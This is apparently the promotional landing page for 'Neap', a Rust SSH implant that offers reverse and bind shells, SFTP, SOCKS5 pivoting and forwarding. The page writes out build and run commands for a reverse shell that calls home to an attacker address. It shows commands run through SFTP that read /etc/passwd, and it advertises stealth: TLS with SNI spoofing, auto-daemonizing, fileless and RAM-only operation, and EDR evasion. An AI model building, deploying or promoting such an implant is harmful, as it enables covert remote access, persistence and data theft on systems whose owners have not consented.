SSH server, single static binary

Reverse shells, bind shells, SFTP file transfer, and full SSH port forwarding. TLS wrapping with SNI spoofing. Build-time configuration. Rust rewrite of Undertow.

Download Latest View Source
neap 
$ ./build.sh reverse 10.10.14.5:443 --tls --password "s3cret"
building reverse mode (10.10.14.5:443, TLS)
target/release/neap (1.2 MB, static)

# On target:
$ ./neap
SSH session established (PTY allocated)

# SFTP transfer:
$ sftp -P 443 user@target
Connected to target.
0
Modes
0
Forwarding
0
Platforms
0
Binary
0
Dependencies
FEATURES

SSH operations in a single binary

Reverse and bind shells with full PTY. SFTP transfers. Local, remote, and SOCKS5 forwarding. TLS wrapping.

Reverse Shell

Dial home to attacker with full PTY support. Linux openpty and Windows ConPTY. All parameters baked at build time — no flags needed on target.

$ ./build.sh reverse 10.10.14.5:443
# On target, just run:
$ ./neap
SSH session active — Ctrl+C to disconnect
~1MB
Static Binary

Bind Shell

Listen for incoming SSH connections on any port. Full PTY, SFTP subsystem, and port forwarding available to connecting clients.

SFTP Transfer

Full SFTP subsystem over the SSH channel. Upload and download files through any standard SFTP client.

Relay & SOCKS5

Port forwarding, multi-hop chain relay, and proxychains-compatible SOCKS5 proxy server.

0
Dependencies

TLS Wrapping

Wrap SSH traffic in TLS with configurable SNI spoofing. Traffic blends with normal HTTPS. Build-time flag — no runtime configuration needed on target.

$ ./build.sh reverse 10.10.14.5:443 --tls
TLS + SNI spoofing enabled
traffic appears as normal HTTPS — padding 256B, jitter 50-150ms

Build-Time Config

All connection parameters embedded at compile time. Target binary auto-connects with zero flags. Password, TLS, port — all baked in.

SFTP Shell (/exec/)

Execute commands through any standard SFTP client. Access paths under /exec/ and Neap runs the command, returning output as file content. Works with OpenSSH, WinSCP, FileZilla, scp, curl — no custom tooling.

sftp> get /exec/whoami /dev/stdout
root
sftp> get "/exec/cat /etc/passwd" /dev/stdout
root:x:0:0:root:/root:/bin/bash

Auto-Daemonize

Automatically backgrounds on launch. Unix double-fork with full terminal detach. Windows detached respawn. Zero visible process window. Silent by default.

In-Memory SFTP

RAM-only file storage with --memfs. Files never touch disk. Zero forensic artifacts. All data lost on exit — by design.

$ ./build.sh reverse 10.10.14.5:443 --memfs
in-memory SFTP enabled (no disk artifacts)
uploads/downloads stored in RAM only
CAPABILITIES

Capabilities

Full SSH operations on Linux and Windows. Single static binary with zero runtime dependencies.

Reverse Shell
Bind Shell
Full PTY
SFTP
Local Forward
Remote Forward
SOCKS5 Dynamic
TLS Wrapping
SNI Spoofing
Static Binary
Password Auth
Pubkey Auth
Build-Time Config
UPX Compression
SFTP Shell (/exec/)
Fileless Exec (memfd)
nexec Helper
Auto-Daemonize
In-Memory SFTP
ConPTY (Windows)
EDR Evasion
Full   Linux Only   Not Supported
ARCHITECTURE

Two-mode architecture

Bind or reverse mode sharing the same SSH session layer. Pluggable subsystems for shell, SFTP, and forwarding.

1

Mode Dispatch

Entry point selects bind or reverse based on build-time config. build.sh embeds connection parameters. Runtime flags for verbose and port override.

2

SSH Session

Rust SSH implementation with channel multiplexing. Subsystem dispatch to shell (PTY), SFTP, or forwarding based on client request.

3

Shell + SFTP

PTY via openpty (Linux) or ConPTY (Windows). Full SFTP subsystem for file operations. Job control and signal passthrough.

4

TLS + Forward

Optional TLS wrapping with SNI spoofing via rustls. Local, remote, and dynamic SOCKS5 port forwarding through the SSH tunnel.

GETTING STARTED

Build and deploy

Build a configured binary with one command. All parameters baked in at compile time.

build
$ git clone https://github.com/Real-Fruit-Snacks/Neap.git
$ cd Neap
$ ./build.sh reverse 10.10.14.5:443 --tls
target/release/neap (1.2 MB, static)
usage
# Bind mode
$ neap -l -p 4444

# Reverse (auto-connects with baked config)
$ ./neap

# SFTP
$ sftp -P 4444 user@target

# In-memory SFTP (no disk artifacts)
$ neap --memfs -l -p 4444

# SOCKS5 pivot
$ ssh -D 1080 -p 4444 user@target
DETECTION AWARENESS

Know the boundaries

Hidden From

  • TLS wrapping — traffic appears as HTTPS
  • SNI spoofing — TLS hello mimics legitimate domain
  • Static binary — no runtime dependencies to fingerprint
  • Build-time config — no CLI args visible in /proc
  • Auto-daemonize — no visible terminal or window
  • In-memory SFTP — zero disk forensic artifacts
  • SFTP shell — command exec without SSH shell channel
  • Fileless exec — memfd_create on Linux, no disk touch
  • SSH protocol — encrypted channel end-to-end

Visible To

  • Network flow analysis — connection metadata
  • SSH fingerprinting — banner and key exchange
  • EDR/XDR — behavioral analysis of shell activity
  • Process monitoring — shell child processes visible
  • JA3/JA4 — TLS client fingerprinting